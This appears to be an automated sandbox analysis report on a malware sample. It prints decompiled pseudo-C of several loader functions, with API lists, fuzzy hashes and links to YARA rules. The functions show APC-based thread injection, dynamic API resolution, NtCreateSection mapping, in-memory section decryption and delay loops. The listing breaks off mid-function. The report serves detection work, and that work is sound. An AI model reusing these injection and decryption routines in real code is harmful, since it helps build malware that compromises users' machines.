Instruction Fuzzy Hash: 43213C7590025DFFEB019FA4DC88EEEBF79EB44304F0000AAF910A65A1D7719E55EB60

Uniqueness

Uniqueness Score: -1.00%

Function 001C225B, Relevance: 9.2, APIs: 6, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E001C225B(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E001C550E();
				if(_t21 != 0) {
					_t59 =  *0x1cd25c; // 0x10000106
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x1cd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x1cd164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E001C3D0D( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x1cd27c; // 0x317a7d0
					if( *0x1cd25c > 5) {
						_t8 = _t26 + 0x1ce5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x1cea15; // 0x44283a44
						_t27 = _t7;
					}
					E001C1BF4(_t27, _t27);
					_t31 = E001C1B2F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x1cd270 =  *0x1cd270 ^ 0x81bbe65d;
						_t32 = E001C2049(0x60);
						__eflags = _t32;
						 *0x1cd32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x1cd32c; // 0x33497d8
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x1cd32c; // 0x33497d8
							 *_t51 = 0x1ce836;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x1cd238, 0, 0x43);
							__eflags = _t36;
							 *0x1cd2c4 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x1cd25c; // 0x10000106
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x1cd27c; // 0x317a7d0
								_t13 = _t58 + 0x1ce55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x1cc2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E001C269C( ~_v8 &  *0x1cd270, 0x1cd00c); // executed
								_t54 = E001C4094(_t55);
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E001C96A4(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E001C6786(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E001C3DD9(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x1cd160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E001CA501(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x001c225b
0x001c2266
0x001c2269
0x001c226c
0x001c226f
0x001c2276
0x001c2278
0x001c2284
0x001c2286
0x001c2286
0x001c228f
0x001c2297
0x001c229a
0x001c22b4
0x001c22c0
0x001c22c2
0x001c22c7
0x001c22d1
0x001c22d1
0x001c22c9
0x001c22c9
0x001c22c9
0x001c22c9
0x001c22d8
0x001c22e5
0x001c22ec
0x001c22f1
0x001c22f1
0x001c22f9
0x001c22fc
0x001c2322
0x001c232e
0x001c2333
0x001c2335
0x001c233a
0x001c2366
0x001c2368
0x001c233c
0x001c2340
0x001c2345
0x001c234a
0x001c2351
0x001c2357
0x001c235c
0x001c2362
0x001c2369
0x001c236b
0x001c236d
0x001c237c
0x001c2382
0x001c2384
0x001c2389
0x001c23b9
0x001c23bb
0x001c238b
0x001c238b
0x001c2391
0x001c239e
0x001c23a4
0x001c23a4
0x001c23ac
0x001c23b5
0x001c23bc
0x001c23be
0x001c23c0
0x001c23c7
0x001c23d4
0x001c23de
0x001c23e0
0x001c23e2
0x00000000
0x00000000
0x001c23e4
0x001c23e9
0x001c23eb
0x001c23f2
0x001c23f6
0x001c23f9
0x001c240e
0x001c2412
0x001c2417
0x00000000
0x001c2417
0x001c23fb
0x001c23fd
0x00000000
0x00000000
0x001c2403
0x001c2408
0x001c240a
0x001c240c
0x00000000
0x00000000
0x00000000
0x001c240c
0x001c23ef
0x001c23ef
0x001c23c0
0x001c22fe
0x001c22fe
0x001c2303
0x001c2419
0x001c241d
0x001c2425
0x001c2425
0x00000000
0x001c241d
0x001c2309
0x001c230c
0x001c2316
0x001c231d
0x00000000
0x001c242d
0x001c242d
0x001c2431
0x001c2435
0x001c2435

APIs

Part of subcall function 001C550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,001C2274,00000000,00000000), ref: 001C551D

CoInitializeEx.OLE32(00000000,00000002), ref: 001C228F
CloseHandle.KERNEL32(?), ref: 001C22F1

Part of subcall function 001C2049: RtlAllocateHeap.NTDLL(00000000,00000000,001C7E50), ref: 001C2055

memset.NTDLL ref: 001C2340
RtlInitializeCriticalSection.NTDLL(03349798), ref: 001C2351

Part of subcall function 001C3DD9: memset.NTDLL ref: 001C3DEE
Part of subcall function 001C3DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 001C3E22
Part of subcall function 001C3DD9: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 001C3E2D

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 001C237C
wsprintfA.USER32 ref: 001C23AC

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapInitializememset$CloseCriticalModuleSectionlstrlenwsprintf
String ID:
API String ID: 2559618991-0
Opcode ID: 3d8491ff115a5695b65e87e7bea1a0bed8a21c0bd6eaeac314b1a2e3c4c49e86
Instruction ID: 018a4470ad334a85a8b3cde4cd69af774d6c349fba0f8e155aacbcbb379d25aa
Opcode Fuzzy Hash: 3d8491ff115a5695b65e87e7bea1a0bed8a21c0bd6eaeac314b1a2e3c4c49e86
Instruction Fuzzy Hash: B451DDB1A00214ABCB24DBE4EC45F6E7BA8BB28704F14443EF502E7551E7B4DD808B90

Uniqueness

Uniqueness Score: -1.00%

Function 001C163F, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 001C1680
ObjectStublessClient9.OLE32(?,?), ref: 001C1721
StrStrIW.SHLWAPI(?,006E0069), ref: 001C1741
SysFreeString.OLEAUT32(?), ref: 001C1763

Part of subcall function 001C52F9: SysAllocString.OLEAUT32(001CC2B0), ref: 001C5349

SafeArrayDestroy.OLEAUT32(?), ref: 001C17B7
SysFreeString.OLEAUT32(?), ref: 001C17C5

Part of subcall function 001C2436: Sleep.KERNEL32(000001F4), ref: 001C247E

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayClient9DestroyObjectSafeSleepStubless
String ID:
API String ID: 2166904396-0
Opcode ID: 444df73a47a44f324cd2f091fdfaf4323a0ae80e6ce0b3b8452c3602172e6c3e
Instruction ID: 66b18c8a3f14d872559455dd1a247bea2a4251066ee5cdba7cd4f4fe381a1e38
Opcode Fuzzy Hash: 444df73a47a44f324cd2f091fdfaf4323a0ae80e6ce0b3b8452c3602172e6c3e
Instruction Fuzzy Hash: B251067690020AAFCB00DFE8C884DAEB7B6FF99740B158869E505EB221D771ED45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10001A0F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E10001DE1(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x10004150 + 0x10005014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x10004150 + 0x10005151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E10001DFC(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x10004150 + 0x10005161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x10004150 + 0x10005174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x10004150 + 0x10005189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x10004150 + 0x1000519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E10001EB5(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x10001a1d
0x10001a21
0x10001ae2
0x10001a27
0x10001a3f
0x10001a4e
0x10001a55
0x10001a59
0x10001a5c
0x10001ada
0x10001adb
0x10001a5e
0x10001a6b
0x10001a6f
0x10001a72
0x00000000
0x10001a74
0x10001a81
0x10001a85
0x10001a88
0x00000000
0x10001a8a
0x10001a97
0x10001a9b
0x10001a9e
0x00000000
0x10001aa0
0x10001aad
0x10001ab1
0x10001ab4
0x00000000
0x10001ab6
0x10001abc
0x10001ac2
0x10001ac7
0x10001ace
0x10001ad1
0x00000000
0x10001ad3
0x10001ad6
0x10001ad6
0x10001ad1
0x10001ab4
0x10001a9e
0x10001a88
0x10001a72
0x10001a5c
0x10001af0

APIs

Part of subcall function 10001DE1: HeapAlloc.KERNEL32(00000000,?,10001556,00000208,00000000,00000000,?,?,?,100016A9,?), ref: 10001DED

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001E4D,?,?,?,?,?,00000002,?,10001401), ref: 10001A33
GetProcAddress.KERNEL32(00000000,?,?,?,?,10001E4D,?,?,?,?,?,00000002), ref: 10001A55
GetProcAddress.KERNEL32(00000000,?,?,?,?,10001E4D,?,?,?,?,?,00000002), ref: 10001A6B
GetProcAddress.KERNEL32(00000000,?,?,?,?,10001E4D,?,?,?,?,?,00000002), ref: 10001A81
GetProcAddress.KERNEL32(00000000,?,?,?,?,10001E4D,?,?,?,?,?,00000002), ref: 10001A97
GetProcAddress.KERNEL32(00000000,?,?,?,?,10001E4D,?,?,?,?,?,00000002), ref: 10001AAD

Part of subcall function 10001EB5: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,70D9FFF6,00000000,00000000,?), ref: 10001F12
Part of subcall function 10001EB5: memset.NTDLL ref: 10001F34

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 4ec88815e77cd39fd923d72db13d571f8939319d025cdf8bbff59f143bb65112
Instruction ID: 8e690bc40ad544dced62eb57c6a0da5a983291de411777cdb34876cf766fb635
Opcode Fuzzy Hash: 4ec88815e77cd39fd923d72db13d571f8939319d025cdf8bbff59f143bb65112
Instruction Fuzzy Hash: 5F2117B1601B1AAFE750DFA9DC84EDB7BECEF493C07024466E905C7219EB31E9018B61

Uniqueness

Uniqueness Score: -1.00%

Function 10001AFA, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000410c;
						if( *0x1000410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004118;
								if( *0x10004118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000410c);
						}
						HeapDestroy( *0x10004110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x10004110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x10004130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E100012DC(E1000111A, E100015EE(_a12, 1, 0x10004118, _t41));
							 *0x1000410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x10001afd
0x10001b09
0x10001b0b
0x10001b0e
0x10001b84
0x10001b8a
0x10001b8c
0x10001b8e
0x10001b94
0x10001b96
0x10001b9b
0x10001b9e
0x10001ba9
0x10001bab
0x00000000
0x00000000
0x10001bad
0x10001bb0
0x10001bb2
0x00000000
0x00000000
0x00000000
0x10001bb2
0x10001bba
0x10001bba
0x10001bc6
0x10001bc6
0x10001b10
0x10001b11
0x10001b31
0x10001b37
0x10001b39
0x10001b3e
0x10001b7a
0x10001b7a
0x10001b40
0x10001b48
0x10001b4f
0x10001b59
0x10001b65
0x10001b6c
0x10001b71
0x10001b76
0x00000000
0x10001b76
0x10001b71
0x10001b3e
0x10001b11
0x10001bd3

APIs

InterlockedIncrement.KERNEL32(10004108), ref: 10001B1C
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001B31

Part of subcall function 100012DC: CreateThread.KERNELBASE(00000000,00000000,00000000,?,10004118,10001B6A), ref: 100012F3
Part of subcall function 100012DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001308
Part of subcall function 100012DC: GetLastError.KERNEL32(00000000), ref: 10001313
Part of subcall function 100012DC: TerminateThread.KERNEL32(00000000,00000000), ref: 1000131D
Part of subcall function 100012DC: CloseHandle.KERNEL32(00000000), ref: 10001324
Part of subcall function 100012DC: SetLastError.KERNEL32(00000000), ref: 1000132D

InterlockedDecrement.KERNEL32(10004108), ref: 10001B84
SleepEx.KERNEL32(00000064,00000001), ref: 10001B9E
CloseHandle.KERNEL32 ref: 10001BBA
HeapDestroy.KERNEL32 ref: 10001BC6

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: b2735cd62b98c0fff9eadb96ecfab59fc7d8990f65d57987f5a6912bdf7ccd39
Instruction ID: f0df8185a4137bf23340b4e7eb087222ae8a4cbb436f36e741c86f19ce9e809b
Opcode Fuzzy Hash: b2735cd62b98c0fff9eadb96ecfab59fc7d8990f65d57987f5a6912bdf7ccd39
Instruction Fuzzy Hash: 922190B5601216AFF701DF69CCC4ACA7FE8FB642E07128129FA05D3168EB708D808B94

Uniqueness

Uniqueness Score: -1.00%

Function 001C6A56, Relevance: 9.1, APIs: 6, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E001C6A56(void* __ecx, signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				void* _t21;
				unsigned int _t23;
				signed int _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x1cd238 = _t10;
				if(_t10 != 0) {
					 *0x1cd1a8 = GetTickCount();
					_t12 = E001C8F10(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L001CB226();
							_t33 = _t14 + _t16;
							_t18 = E001C7E03(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33);
						} while (_t18 == 1);
						_t21 = E001C6B96(_t25); // executed
						if(_t21 != 0) {
							 *0x1cd260 = 1; // executed
						}
						_t12 = E001C225B(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x001c6a56
0x001c6a5c
0x001c6a5d
0x001c6a69
0x001c6a71
0x001c6a76
0x001c6a86
0x001c6a8b
0x001c6a92
0x001c6a94
0x001c6a99
0x001c6a9f
0x001c6aa5
0x001c6aaf
0x001c6ab3
0x001c6ab5
0x001c6aba
0x001c6abb
0x001c6abc
0x001c6ac1
0x001c6ac7
0x001c6ad0
0x001c6ad1
0x001c6ad6
0x001c6adc
0x001c6ae1
0x001c6ae8
0x001c6aea
0x001c6aea
0x001c6af4
0x001c6af4
0x001c6a78
0x001c6a7a
0x001c6a7a
0x001c6afe

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,001C807D,?), ref: 001C6A69
GetTickCount.KERNEL32(?,00000001,?,?,?,001C807D,?), ref: 001C6A7D
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,001C807D,?), ref: 001C6A99
SwitchToThread.KERNEL32(?,00000001,?,?,?,001C807D,?), ref: 001C6A9F
_aullrem.NTDLL(?,?,00000009,00000000), ref: 001C6ABC
Sleep.KERNEL32(00000002,00000000,?,00000001,?,?,?,001C807D,?), ref: 001C6AD6

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: b4969752654414f5989e84f43d64d38827dfdec04464fb72dc125965624e1e1c
Instruction ID: 752986c903589b5631ffb705e95d3438df903bf0262336189eace7ecc88b0669
Opcode Fuzzy Hash: b4969752654414f5989e84f43d64d38827dfdec04464fb72dc125965624e1e1c
Instruction Fuzzy Hash: 6511E576A04200BFE720ABB4EC4AF1A7AD8DBA4750F10452CF909D75D0EBB0D89086A6

Uniqueness

Uniqueness Score: -1.00%

Function 100012DC, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100012DC(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x1000414c, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x100012f3
0x100012f9
0x100012fd
0x10001308
0x10001310
0x10001319
0x1000131d
0x10001324
0x1000132b
0x1000132d
0x10001333
0x10001310
0x10001337

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,10004118,10001B6A), ref: 100012F3
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001308
GetLastError.KERNEL32(00000000), ref: 10001313
TerminateThread.KERNEL32(00000000,00000000), ref: 1000131D
CloseHandle.KERNEL32(00000000), ref: 10001324
SetLastError.KERNEL32(00000000), ref: 1000132D

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: f944589a858edab2219560e62326191baa7f7a8351923321239c7166ab578a1d
Instruction ID: 31004d63c2960ea31e2c824d7a0ae826113ff2aaace5ecc64d275acbf5e6dd3f
Opcode Fuzzy Hash: f944589a858edab2219560e62326191baa7f7a8351923321239c7166ab578a1d
Instruction Fuzzy Hash: AAF0F232606631FBF6139BA08C98F9FBBADFB08BD1F01C404FA1591168CB3189109BA5

Uniqueness

Uniqueness Score: -1.00%

Function 001C1A70, Relevance: 7.6, APIs: 5, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E001C1A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E001C2049(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x001c1a7c
0x001c1a80
0x001c1a81
0x001c1a82
0x001c1a84
0x001c1a86
0x001c1a8b
0x001c1a8e
0x001c1b25
0x001c1b2c
0x001c1b2c
0x001c1a97
0x001c1a9e
0x001c1aae
0x001c1aae
0x001c1ab4
0x001c1ab6
0x001c1abb
0x001c1ac4
0x001c1acc
0x001c1acf
0x001c1ada
0x001c1ade
0x001c1ae0
0x001c1ae1
0x001c1aea
0x001c1aee
0x001c1aff
0x001c1af0
0x001c1af5
0x001c1afa
0x001c1b09
0x001c1b09
0x001c1ade
0x001c1b0f
0x001c1b15
0x001c1b15
0x001c1b1e
0x001c1b23
0x001c1b23
0x00000000

APIs

ObjectStublessClient9.OLE32(?,00000008,00000000,00000008,00000000,001C1785,00000008,00000008), ref: 001C1A86
Sleep.KERNEL32(000000C8), ref: 001C1A9E
lstrlenW.KERNEL32(?), ref: 001C1AD4
memcpy.NTDLL(00000000,?,?,?), ref: 001C1AF5
SysFreeString.OLEAUT32(?), ref: 001C1B09

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Client9FreeObjectSleepStringStublesslstrlenmemcpy
String ID:
API String ID: 2118715118-0
Opcode ID: c53f91fe5a1ec5119ec6f626f1848732b5eafc91226c84c5b4c70efbcc5d855c
Instruction ID: fbd54bec2723b223e0b5b00e696f7f6e169ab3395e994eb45ffb0be0a83a8327
Opcode Fuzzy Hash: c53f91fe5a1ec5119ec6f626f1848732b5eafc91226c84c5b4c70efbcc5d855c
Instruction Fuzzy Hash: 5521F675A01209FFCB10DFA8D984E9EBBB9EF59311B1081ADE905E7211EB30DE45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100018F4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E100018F4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x10004130;
				_t39 = E10001F5D(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x1000414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x100051a7; // 0x100051a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E100018C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x1000414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x100018fb
0x1000190b
0x10001912
0x10001915
0x1000192a
0x10001931
0x10001936
0x10001947
0x1000194a
0x10001952
0x10001955
0x100019ff
0x1000195b
0x1000195b
0x1000195f
0x100019c7
0x10001961
0x10001961
0x10001964
0x10001966
0x1000196e
0x10001971
0x10001974
0x1000197c
0x10001984
0x10001985
0x10001986
0x1000198d
0x1000198d
0x100019a1
0x100019a6
0x100019af
0x100019b6
0x100019b9
0x100019bd
0x100019c2
0x00000000
0x00000000
0x10001979
0x10001979
0x100019c4
0x100019d1
0x100019e6
0x100019d3
0x100019dc
0x100019e1
